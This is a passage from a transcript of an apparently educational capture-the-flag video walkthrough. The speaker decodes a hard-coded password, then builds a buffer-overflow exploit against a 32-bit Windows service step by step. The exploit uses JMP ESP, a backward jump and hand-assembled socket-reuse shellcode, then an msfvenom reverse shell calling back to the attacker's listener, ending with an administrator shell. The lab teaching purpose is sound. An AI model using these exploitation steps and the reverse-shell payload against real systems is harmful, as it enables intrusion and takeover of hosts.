lowercase. That did not comment. I guess I did the wrong type of comment. Comment, set pre. Grab this plate. Pre-comment. There we go. I typed it, but we can demo this. Let's just do Python 3. And we can grab the ordinal of A in uppercase. And then we can add 0x20. And we get 97. And if we convert that back to a character, we get lowercase a. So all it's doing here is if it's uppercase, convert it to lowercase. And then again here, this is going to be, let's do comments, pre, if uppercase, then convert back to uppercase, right? So let's do comments, convert back to uppercase. So this function is only doing something on lowercase characters. So if it gets an uppercase, it converts it to lowercase, does its little encoding, and then converts it back to an uppercase. And up here, we do have it like making sure we ignore symbols. So whatever type of encoding this is, it's only going to handle ASCII characters. So now the next thing to do is figure out exactly what this does. So Z minus the character plus 9F. So let's go back here. So we have Z minus, we can do char A, then plus 0x9F. So it's like this. Let's see. We want ordinal of A, ordinal of Z, and we have negative 134. And we just have to add 256 here because it's like a weird signed issue. It just drops the, is it lowest to highest byte? It drops 1 byte in the binary format. So we just add that back to sign it and we get 122. And if I do char of 122, we get Z, which is weird, right? So let's see what B is. We have Y, and then C, X, D is W, and it's now going backwards through the alphabet. So it's like Z, Y, X, W, V, U, T, S, R, Q, O, N, M, L. I just messed it up. But it's just going backwards, right? Every character we have, it inverses it and chooses it from the other end of the alphabet. So what I'm going to do is just call this the @bash cipher because that's exactly what it is. If I Google @bash cipher and we look at this, A becomes Z, B becomes Y. So it just reverses the alphabet. So let's go @bash and this. Awesome. So all that's left to do is now go back and grab that hard-coded password. So maybe functions, do we have a login right here? So that's the other way we could do it. Maybe that way was faster than looking at the string. But I can copy this. We can paste it in. And let's see. We probably want to, because we're decrypting it, we want to do @bash first, which is encryption 2, then ROT47, and we get this. So let's try logging into the application. I'm going to save this, and I'm just going to put them down here. So echo that, and we also want to grab the username. So let's grab this, because I don't want to type these constantly. \n. That was weird. Oh, because it has special characters in it. That's annoying. Echo that, and let's echo the username. Copy. Maybe it's the other clipboard. There we go. Okay, so I can do NC. Let's do NC 10, 10, 11, 115, quad 9. Grab this username. And we can grab the password. And we get logged in. So we have full name. So I do IPsec input code 123. And it says wrong code. So if we go back into this, let's go, let's see. We want to call where login is. So I'm going to do show references. We go back here. And we can see after login, we see login successfully, and we're going to grab the full name. It's going to do strn copy, then input code, and then it's going to call save creds, I believe. So it calls save creds before it does this, it looks like, because we got right here where it says wrong code. If I put this in, I wonder if this is just going to say correct code. Let's see. Echo this. Shoot. Wrong clipboard again. So is that the code? Let's go log in. Oddly enough, okay, there we go. It just took a while to come back. So username, copy this, the password, full name, I'm going to say IPsec, and input code, IPsec, And we kind of just loop here, which is weird. But that looks like it is potentially the code, or it's doing something. Maybe not, because we have unlocked right here. So maybe it wants our username to be this. So I'm going to copy this. Full name. Oh, shoot. Wrong code. Now we got to log in again. So grab this. Grab the password. What? Did somehow I change a password? Username. Or did I copy a single quote? I don't know what happened there. Weird. Maybe I pasted a space. Let's try putting this as the full name just because I did see it in the assembly. But this is the code. It says unlocked. And I have no idea what it's doing now. It just ended. So after unlock, doesn't do anything. So let's look at this save creds. And it's only doing a str copy here, not a strn copy. And this is a vulnerable function. So local 10, it doesn't look like we have a size, but local 42, the size is 50. So we only allocated 50 bytes for this buffer. So I'm going to go back, and I'm guessing this one is going to be the code. So pstack36. So we got to figure out what the max length for a code is defined as. Or we can just do it the easy way and paste a bunch of data. So let's try to log in. Okay. Full name, doesn't matter. And then this, we probably just have to go a little bit above 50 because that's the allocated buffer. So I'm going to paste a lot. And it doesn't tell us wrong code. It just breaks down. So I'm guessing this is going to be a buffer overflow. So I'm going to switch over to a Windows machine. And I've already copied the application here. And I'm going to load up X32 debug. And we're going to analyze this. So I'm going to open, let's see. We want to go over to desktop. And then MyFirstApp. And let's see. Run this a bunch. We can see it started on port 9791. So I'm going to go over here and see 192.168. And I get this guy's IP address, IP config, 58.114. So 58.114. And of course, I got to get the port again because I did not remember it. 9791. So 9791. And can I not connect to this guy? Connection received. Okay, so let's do username. Then let's grab this password. Okay, that's weird. Maybe the password, like, for some reason, like, it doesn't work 100% of the time. I swear I have the right password. Let's do Alfincia. Login successful. Okay. ALFIANSYAH. I have no idea what just went on there. IPsec is the full name. And I may already have some breakpoints here or something. Yeah, I hit a breakpoint. So I'm going to view breakpoints and let's remove all of them. So we can just continue. So input my code. I'm going to hit a bunch of A's. We'll paste them in. And then we see access violation. If I look at the CPU, we can see, where is EIP? EIP is 616161, which is lowercase a. So we have successfully crashed it. So the next piece we have to do is figure out exactly where we can overwrite EIP and what other things we can do. So we're going to find pattern create on our box and just use this MSF pattern create binary to create something the length of 128, because really probably anything like over 70 is going to crash it because it's only allocating 50 bytes for this buffer. So this should be completely fine. And we have to start the binary back up. So let's restart it. Grab the port. It is 9934. Connect. And the username, let's grab this. The password, we can grab it again. Incorrect. This is getting annoying. ALFIN S that. I wonder if I should grab it in my echo statements. I wonder if some characters just not getting printed out. Maybe that's it. It looks the same to me, but okay. I'm getting really confused by this, but that is not out of the ordinary. So I'm going to input this code, and then we should crash over here. And we can see EIP is 4132, so we can copy this value. And now we can go to pattern, do offset -q, and search for that, and we have an offset match at 66. So what I'm going to do is do python 3-c print a times 66 plus, we'll do 4b's, then plus a bunch of c's, right? Let's make that valid code. Let's see, we don't have a single quote there. There we go. So now let's connect back to this 9934. We have to get the new port, which is 9312. I should just look at exactly how the application always sets it to be the same thing, but I'm lazy like that. So I'm going to grab this, and I'm going to grab them from my actual echoes instead of down below, just in case it's different. Yeah, ALFIN-SYH. This is getting so confusing. It's got to be user error somewhere. Weird. But let's copy this. Name IPsec, input this code, and we should see EIP to be set at B's. So if I go back here, we can see 424242, and then ESP is going to be set to C's. And importantly, we don't have that much space in EIP. If we look at this, let's see, follow and dump, we only have, what, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 characters we can do code with. So we really don't have much space in here. However, before, we do have some space. So what we could do is put a jump here to jump backwards to get over to here, which gives us more space. And this still isn't that much space. It's 66 bytes because that's what it took to get here. And while we could probably find some shell code to create a user in this amount of space, we can't add him to the administrator group. I don't know any shell code that can do that that's underneath like 80 bytes. So we have to somehow free up some space or do some type of magic to get extra space here. So what we're going to do is have this, we're going to jump back here, and then in this code, we're going to do something called a socket reuse. Because the application, every time like it's asking for data, it's making a receive call and then accepting data. So we're going to use that receive call again to allocate another 400 bytes of space, and then essentially jump to that. So we're essentially just having the program ask for shellcode and then execute that shellcode. So first off, we should go over to Pwn Tools so we can get our skeleton exploit working, where we can jump backwards and start writing our socket reuse exploit. So I'm going to go back over to my parrot. I'm going to do a pane. I'm going to call it exploit.py. Then we're going to do from pwn import star, and then we set up the remote. So 192.168.58.114, and this is the Windows VM on my host. And I'm going to have the port be a argument. So I'll just do sys.argv1, and we also have to now import sys because the port changes every time for some reason. So we know junk, and we can set junk to be, when I do debugging, I always like setting it to be a lot of breakpoints, which is CC. So we can do this times 66. And then we want the jump ESP, and we have to find where that is. And then the next thing we need is jump back, and then probably 70, because we want to jump here, and we want to go like, so in our payload, we have ESP, which is going to be 4 bytes. So we can get the beginning of the jump. So jump back 70, which is our ESP length plus the junk, is equal to something. So let's get ESP real quick. So we can easily find that over here. If we just right click on like the CPU pane, go to all modules, command, jump ESP, and we should be able to pick any one. I'm going to pick the very first one here. So copy address, and we can paste the address in here. So P32 0x, like that, I believe. And then we need jump back 70. So what I'm going to do is we're going to locate metasm and just execute this interpreter assembly shell. And then we should be able just to type exactly what we want. So jump minus 70, maybe. No, that's not it. I think I had the arguments, the things correct, just in the wrong order. So there we go. There's jump backwards 70. So this is the instruction for that. We're just going to do B and paste this in. So now we should be able to create the payload is equal to junk plus jump ESP plus jump back 70. Okay. And I think I'm going to go over back here before I forget. We can put F2 there. So we set a breakpoint on this jump ESP, which is going to make it super easy to debug everything. Alternatively, we could have like put the breakpoint, whoops, like put a breakpoint this way, but I'd rather just set a breakpoint on this address. So there we go. And then I read something cool in Pwn Tools. Let's see. Pwn Tools, receive and send. Is that a thing? I know there's a function that will like receive line and then send. Receive and I'm not sure. We'll just do it the old-fashioned easy way. So r.receive until, and then ask us for the username. And then we do r.send line. And hopefully I copy it right, because this is where we've been having issues, right? So I copy that, put it here, paste this, and then r.receive until, and it's going to ask us for the password next. And then we want to send the password. We need to encode that as bytes. Go back to this pane, copy this, paste this, and then we want to receive until full name. So copy r.receive until full name. And I just want to go back real quick. It is typed like that and no space. So the next thing I want is to get until code. So I'm just going to copy this and we can replace full name with the code. And here we want to send our name. So I'll send IPsec, and this piece doesn't matter, but the code, this is where we finally send our payload. Okay, so as long as I typed everything correctly, this should crash this program, but we'll be able to see exactly where it crashes. So I'm going to run this. I'm going to look at the port 9614. 9614. We open the connection. Connection created. What did we did something wrong. Receive until full name. So I wonder if it did not get the password. So 9712. 9712. Open connection. It's not liking that. That was weird. I guess they wanted Python 3.9. Okay. I'm not exactly sure what happened, but it works. So we see we are at the breakpoint that we set. So this is the jump ESP. And I'm going to follow this. And then it's just routed somewhere. So we're going to... Oh. We're getting a exception access because ESP is on the stack. And in my VM, I have dep enabled. So this exploit is going to require a host to not have dep, and I don't know how to check that. So we just kind of hope it does not have dep on. And this is one of those weird things. I can't fully explain exactly all the scenarios it does because, like, my VM defaulted to having dep enabled. So if I go to, let's see, settings, data execution. So what I did, let's move this window real quick. I just executed system properties advanced. You could also go to like computer, let's see, this PC properties. I think find it through here somewhere. Advanced system settings, right? So you could find it that way as well. But then you go the advanced tab, click on settings, and then data execution. And like my host OS, this is the default. Maybe it's because my host OS is Windows Pro and this VM is Windows Enterprise, but the default setting for this was all programs except those I select. On my host and what I'm hoping to target, it's set to this, which is for essential Windows programs and services only. So let's disable dep for a program. So I'm going to go back to my desktop and we just select MyFirstApp. And now data execution protection, I think that's what dep is now disabled for this application. So I wish I knew how to check that on a target, but the ways I know how to require administrator. So we're back here. Let's look at the port 9179. Let's go here, 9179. We open the connection. And now we paused. So we hit our jump ESP, follow that, and now we are, let's see, at the start of our junk, right? So if I continue, we are at all the junk characters. So if I put something there, so let's just try something real quick. So v exploit.py, let's do Let's see. I'm just going to call this receive because that's what we want it called later. But I'm going to do \x d3 ad co. I'm probably not doing this in the right order. But I want to say it. I want those registers, or not registers. I want it to say dead code where I jump. So let's see. Now we just got to change this. It was 66. So we're going to multiply it by 66 minus the length of receive. So no matter what we put in this variable, it's going to subtract it from our junk. Okay. So let's go back here, go back to our Windows, run it. Okay. We are port 9535. 9535. I don't think that worked. Access violation. That was not what we wanted. 9597. That looks better. Nope. Let's see, what's EIP? We screwed something up significantly. Oh, I'm not encoding this, so it's probably putting the B's for me and messed up my whole stack. So let's try this. As you can see, very easy to make the smallest mistakes. 9731. That was too fast. I don't like that. Access violation. I did not get the port. 9773. So we are crashing somewhere. I'm not doing what I thought I was going to do, which isn't a big surprise. So let's look at the exploit again. Let's see. Length of... Oh! We did not put receive in our payload. So EB B8. So they got EB, or there's probably going to be something truncated, but yeah. So I subtracted from a junk, but did not add this data. So there we go. So this time it'll work. The difficulties of doing this while talking, because this is pretty hard to begin with. So 9979. 9979. Okay, that's good. We hung, which means we probably hit our breakpoint. I'm going to step in, and this is going to be the jump back 70, so EBB8. So we hit jump ESP, we jump backwards, and now you can see we're at dead code, which is going to crash because this isn't valid assembly. I just wanted to play with proving I can control everything exactly as I want. So what we're going to have to do now is some little magic with the registers, because let's see, if we go back in Ghidra, let's see, I'm going to run it again. We got to find a receive call. Let's see, do we have one quickly? It'll probably happen if I break. If not, we're going to go in Ghidra, get some memory addresses. So let's go 9158. That's too fast. Oh, okay. Oh well. So let's see. IPsec. I'm looking for receive. Let's see. I'm probably going to have to just go in Ghidra and get a memory address, because I am not finding it here. But what I'm trying to do is find where it accepts IPsec. And then I can, oh, that's closing the socket. So I should be close. Let's send. Let's see, is there a call EAX? It's probably just above here. Move D-word. So, okay. So this is a receive call. This is where we want to break, because we need to get the receive socket or handle. So let's see. We can break here first. So I'm going to break at 71901D79. So this is going to be the call to receive, to get data. So let's now restart the application. Grab the port, 9511. Okay. And now we broke here, and this is the receive call. And it pulls it off the stack, and the very first parameter in receive is going to be the handle for the socket. So if I just Google receive like this, I think. Let's see, maybe add MSDN to make sure it's Windows. So the first thing is the socket. Then this is going to be the output where the variable is stored. Then we got the length and the flags. So there's 4 different parameters in receive. So the first one, we want to be able to grab this, 294. Then this is going to be the variable it sends it at. And this is the size, so it's accepting 400 bytes. And then the flags are 0. So in our assembly, we're going to recreate all of these numbers. And these two are pretty much easy because they're kind of hard-coded. The difficult one is going to be getting the length, because this is going to be, I think, an EBP, and our buffer overflow actually overwrites where it's stored. So I'm going to jump here. So we're at the jump ESP. If we go into this, then this is jump backwards. Now we're at the dead code. This is where like the handle would be, but it's not there. However, if we look at ESP, so let's see if I can follow this in memory. Oh, I did not want to do memory map. Let's see. Okay, so we're here. So we want to look for, I think it was like 298. And this being such a big font is messing me up. So do we have it anywhere here? Scroll down. Oh, it may be right here. It may be 294, not 298. Let's restart the program so we can get the handle. Should always write these things down. So 9151. Let's go here. 9151. Open the connection. Okay. So 294. So handle 294. Okay. That's the piece we need. So we can jump to our ESP, and then we step in. This is jump backwards. And here we are. This is where ESP is, I believe. ESP, where is it? FF18. So ESP is highlighted. And we want to find 294. And that should be somewhere here. Right here. So, shoot. I'm trying to get both of these on the same screen. So we need to go from FF60 to FF18, which I want to say that's like 48. Let's go. We have Google here. Google 0x60 minus 0x18. 0x60 minus 0x18. 48. So 48 bytes off of ESP is going to be the handle for a socket. And we can't just create a new socket for receive because it will require like a new port and everything else. So this is where the socket reuse gets its name, because we're reusing the socket that's already created. So this is where it's probably going to get a bit tough because we're going to have to handcraft some assembly to recreate this for us. So met ASM is down here. Okay, and we want to go into exploit.py, and for the receive, let's see. We need to make a push ESP to push it to the stack. So push ESP, and that's \x 54. I'm going to put a bunch of spaces, and we'll call this push ESP. So we save it to the stack, and then we're going to pop it over to EAX, which is like our register for handling math and stuff. So so we're going to pop EAX \x 58, pop EAX, and now we're free to do math because this is just the ESP register and we need to add 48 to it. So if I do add AX 48, we're going to get a null byte. And these are really bad whenever dealing with like networking sockets. So I just know off the top of my head, we can't have that. So this makes it tough because we can't just add 48. However, we can probably add something and then subtract it, right? So instead of adding 48, we can try adding 100. And we're still at this weird null byte. So maybe 120, 130. Let's try 150. 175, 190, 200. Am I doing this wrong? Let's see. 195, 7, 8. Why is it always having this null byte? Add AX 400. That's better. Let's see. 200? Oh, wait. I realize what I'm doing wrong. I should be doing hex. So let's try 100 hex. There we go. But we have a null byte here. 101. There we go. So if we added 101 to the register, now we just have to get down to 48. So let's go back to Google. 0x101 minus 48. Google 0x101 minus 0x48. So now we have to subtract B9 from the register. So sub AX 0x B9. And this one has a null byte. So that sucks. So let's try 190. Okay, so 901. So this looks good. So go back to Google, 0x190 minus 48. So let's subtract 148. So sub AX 0x148, right? Yep. And we don't have any null bytes here. So I think this is going to be good opcodes. I think that's the right terminology, but let's add them here. So receive plus equals B, like this. And this is add AX 0x190. And then receive B. And we just got to copy this. And then we can say this is sub AX 0x148. And all this is going to do, this is grab socket handler, right? And then we could say over here, do a little extra work because can't push 0x48 due to null bytes. I don't know if I like that because now it's going into the assembly, but we should remember exactly why that is. And then what we have to do now is move EAX into ESI. So move ESI, the value of EAX, receive. And I'm sure in Pwn Tools I can probably type out this assembly somehow and have it automatically do this for me. This is probably not the most efficient way to do it, but for demoing it, this is how we should show it. So after this, we can see exactly how this looks. So I'm going to write this, and they're going to exploit it and see what happens. Continue. We're not listening yet. Hit a few more. There we go, 9022. So an open connection, hit all the breakpoints, right? So this is calling EAX. This is starting the receive, which is on 294 as the handler. So we jump ESP, we can skip that. This is a jump backwards. And now we're at the shellcode we put. So all we want to do is make sure 294 gets into ESI. So right now we're pushing ESP to the stack. So you can see right here, that's going to go down here to the stack. Right? There we go. And now we're popping it up to EAX. And now we're going to add the 190 to this address. And then we're going to subtract 148. And if we look at where this is, FF60, it is 294. So we're going to move that into ESI. And we can see ESI is now 294. So if we push this to the stack, now we can put the actual socket on the stack itself. The issue we have right now is we're going to set up this receive call. And I'm probably going to get the terminology wrong. It's a 50-50 chance, and of course, I'm always lose those. But ESP, as we allocate data, we slowly move up the stack like this. And we're going to allocate like 400 bytes for a receive call. And if we do that, we're going to overwrite EIP and crash the program. So the next thing we want to do is change what ESP is. We could go down here and allocate enough space, or we could just do a nasty hack and say, let's jump it up here. So jump higher. So let's make sure ESP is above EIP. So I'm going to sub ESP, and we're going to pick 0x64 and edit the exploit and show exactly this. So move ESP away from EIP, receive plus equals B, and this will be copy, paste, and then sub ESP 0x64. So let's see exactly what this looks like. And for those people that experience that know this, my apologies for going so slow through this. I'm trying to explain it the best of my ability so anyone can understand. So 9597. And mainly so I can understand when I do this again in the future, because this is not something I just have all memorized. It took me a while to work through this problem. So now we're here. We can continue. Here's the jump ESP. We go back. Go here, we're putting our socket handler, and now we're here. So subtract ESP 64. So ESP is here, EIP is here. I'm going to go 1, and now ESP is above. So when I allocate a bunch of data, I don't risk creating a buffer overflow on myself. I'm just in a safe space, right? It's probably going to destroy the program, but at least I won't crash and I'll get my shell first. So that is what we did there. And now this next piece, we have to get all the flags back. So let's see. Let's redo this. So let me go back here. Stop, start. Okay, look at the port, 9862. So 9862. So now what we're doing is rebuilding this. So we're going to have to push 0, then 400, then an address, and then the socket handler. So we have to push all those variables in that order. Let us start this. We can't exactly just push 0 because of the null byte. However, we can XOR something, and if we XOR it with itself, it will become 0. So let's go to exploit. So we're going to 0 out the register. So this will be build receive call. Receive plus B \x31 \db. And this is XOR EBX to EBX, which is going to set the EBX register to nothing. So the next thing we can do is push EBX, and that will push 0 on our stack. So the flags is done. Now the next thing, I think that was the 400 piece, right? We need to get that. So I'm going to do add bh 0x400. What? Oh, add. Let's restart this. Add bh0x400. No matching opcode. Oh, wait. It's the EBX register we're trying to add to, and that's short for BX, not BH. So let's try this again. And we have our null byte here. So I'm just going to do the 4. So now we have 404. So let's go up here, receive, B, like this. And this is going to be add bx0x404. And now we just want to push these. So push EBX, push ESP. For ESP. Okay. Let's see exactly where we are real quick. I'm guessing now I have to build the memory address. So let's see. Stop, start. Run it. I got the port wrong. 9067. Okay, so we'll call EAX. Now we go to the jump ESP. Okay, so here should be good. Now we're moving ESP above this. Okay, XORing EBX, so EBX should go to 0. Then we're pushing that to the stack, so 0 should go here. Now we're going to add 404 to EBX, which is currently 0. So we add 404. Then we do that. Okay, so yes, we have the first two. So now we have to get a memory address on it, which is going to be, let's see, let's go back into the exploit. So the next call, we want to pop EBX, receive plus equals \5b, pop EBX, and then receive trying to think what we want to do with this address. So do we have it here? So this should go to, well, let's see exactly what that does real quick. This is where I'm starting to struggle on this exploit, if you can't tell. Let's see, 9501. 9501. Sometimes I have to run it twice. I don't understand that, but let's see. Jump ESP. Okay. Go here. Now EBX, when we pop it, is set to this, which is above our current EIP, I believe. EBX, yep, is right here. So we want to change this to be somewhere in our junk, because this is where we're going to be loading the data we write with a new receive. And just going to be lazy because we just, I believe, subtracted 64 from ESP. And since these are the same, I can just add 64 and I should be somewhere there. So let's see. Where am I? Let's go back here. If I do 0x0253 FEAB, I type of that, FEAB plus 0x64, we go to FFOF, I believe. So FFOF. So this is where we'd land. We could do some math and make it a bit higher, but as long as we're somewhere here, it's not going to matter, because when I weaponize this, I'm going to change all these to be NOPs, and it'll just be a NOP sled to where we are. So let's do that change. Let's see. Get out of this. V exploit. And the next piece we want to do is add EBX 0x64. Add. Is it going to be EBX or BX? I think this will be fine. Let's see. B \x83 C3 64. And this will be add EBX 0x7C. And then we can finalize it with push EBX. So push EBX, and then we'll want push ESI, and that should be the socket descriptor still. So 0x53, push EBX, and the next one, let's just yank this, 56, ESI. Okay. And then the last piece we're going to have to do is call receive. Because we set up all of our arguments like this, but we have to do the actual calling of the receive function. So let's just go over into Ghidra and find where receive is. So I wonder if I go back. Let's see, do we have anything? Where am I? Let's just go cross references to login. Show references to login, and hope I can do this. Let's see. So here's the socket. We just defined the socket's address. Thread created. Let's see, username. Pointer to external socket. Receive, is this the memory address? I want to say this is the memory address where we're going to grab it from, where receive is. So I'm going to copy this, go here, and we want to load that. So move EAX 0x. Oh God. Don't know what that is. So move EAX. Let's see. This clipboard. There we go. 0x AC. So hopefully this is going to be the receive call. So we can copy this. Receive is equal to B, like that. And this will be move EAX 0x71908 to AC, receive address. And then finally we do call EAX, receive is equal to \x ff \x D0. There it is. Call EAX. Okay. Hopefully this works. So I'm going to go back here. We're going to stop it, run it again. 9874. 9874. Push EBX. I probably forgot to end a quote somewhere. No? Let's see. 25. Plus equals. I don't know why I reversed that. There we go. So we go back to our Windows. Thread create it. Not sure exactly what happened there. Okay. So we're at the call EAX. We jump. We're at ESP. Now this is jumping back. And here's all our magic. If we can see, it's resolving to receive, so that memory address was correct. So here, we're taking the socket address, going back. And, ooh, that may be wrong. F0? That's an address, that's 404 and 0. So that looks good, but that does not, because it was always like 290 something, right? It could just be the handle changed that much, but 9159. Let's double check that. 9159. Okay. So this should be 290. I'm guessing we screwed up somewhere. Okay, so we do this, this, and this ESI now should go to 290. It does. Let's see. Going. Oh, 290. So I guess that one time it was just weird, but nope, that looks correct. So if we go to this address, the 26, let's just Control Z or Control G 0x264FF10, and that's somewhere in here. So that all should be good. So I bet if we continued, we hit another breakpoint. That one breakpoint we hit was the receive call. And now we're in this like exception loop. So I think we are pretty much good to go. The next piece we're going to have to do is create a Metasploit payload. So MSFVenom-P Windows reverse shell TCP. And I'm not doing the x64 like we did last time because this application is 32-bit. So lhost, let's get that. So if config, I'm 192.168.58.230. L port is going to be 9001. I like doing exit. Is it? How do I do EXITFUNC? I think it's just EXITFUNC. Let's see. Yeah, EXITFUNC is equal to thread. So what this does is, or exit of the shell is going to be a thread exit, not a program exit. So if we kill a shell, it doesn't kill the program. At least that's the idea. And then -fpy for Python for format. So we also need to say bad characters is 0x00. So this should do a Shikata GNI, or however you pronounce that. Invalid payload. Windows reverse shell TCP. What? MSFVenom -L payloads. And we have to just figure out what that is. So we're out of that shell. Let's do reverse shell Windows. Let's see, PowerShell. Oh, underscore reverse underscore TCP. So reverse let's see, encrypted shell reverse TCP. Maybe I just mistyped reverse. That looks like it's generating. So once it builds this shellcode, we can pop it into a program. So v exploit, paste in that. We do this receive. I'm going to from time import sleep, so we can wait a second because the receive isn't sending anything. We just gotta wait a little bit after we send the payload for it to hit that receive call. I am going to change these interrupts into a NOP sled. So change that to 90, sleep 1, and r.send line buff. And buff is our MSFVenom shell. So it's not going to work in our debugger. I don't know exactly why. So I'm just going to close that. I probably should have left it open, but we'll see if it works. 9138. So where is exploit 9138? Run it, open connection. I did not listen on 9001. Oh, we got a shell. So I guess it was just waiting for us. I'm going to double check that just to be safe. So we're waiting on connection. We need to 9223. Get it? Did we just crash it? That is weird. 9288. There we go. Didn't crash that time. So maybe it's not 100% reliable, but we have the shell. And then if I exit this, we'll see if this program closes. So exit. And looking back here, the program stays open. So I just want to change that exit thread real quick. And then we'll test it against the target. So exit thread. If I take this off, and we're just going to do this payload without that, I just want to see if it forces the program to close when I exit my shell. Just one of those things I always like testing to validate my knowledge when I say something, because that may not be what it's doing. Oh, deleted way too many lines. Well, maybe I deleted exactly enough lines. I don't know, but there we go. Paste this, save it. And now we just have to get the new one. So MyFirstApp 9533. We ran it. We did not set up or listen. We got the shell. The application's still open. I'm going to tape exit. We're going to look here, and the application closed. We can show that again, 9612. Exploited. So looking at this, thread is open. I'm going to minimize every other application. So you can see that is open. Type exit here, and it calls exit on the program and closes the whole thing. So that's why that EXITFUNC thread is important. So let's search it again. We grab it. And now let's set lhost to be 10.10.14.8 because we are testing it against the target. And then let's make sure we're listing on 9001. So grab this buffer. And then we'll throw it. Okay, vexploit.py. Delete the lines. Paste it in. And let's go look at the port. Nope, we don't look at the port. We have to edit this to be the target. 10.10.11.115. The port is going to be quad 9s. So 9999. We're already listening. We ran, and we have a shell. So if I do who am I, we're administrator, so I can do users, administrator, desktop, and we can get the root.txt. So that is the actual exploit. Hope you guys enjoyed that. I'm just going to re-explain this whole thing, so feel free to stop watching, or if you're confused by it, maybe this piece will help, or maybe it'll make you more confused. So we'll do our best. So here, all that buffer is output from this. So here, what we're doing, grab socket handler. This is so we can read data on receive, right? Now we're moving ESP away from EIP. That should be the self-explanatory thing. That's why, like, we just move it above EIP, so that way, no matter what we put on it, we don't overflow ourselves. Build the receive call. So this, let's zero out EBX and push. This is for flags. Okay, this one is allocate space for receive. And if we looked at the arguments, receive Windows, that is this, the length. So we push it, and let's see, we push ESP. I think we're just saving ESP to the stack there. Let's see, what do we do next? This was 64. Because this is add EBX here in 64. I don't know why I did 7C. That's weird. Let's see. So this would be set where data is saved to from receive. Okay. So I think that may be pretty much it. So hope you guys enjoyed the video. Take care, and I will see you all next week.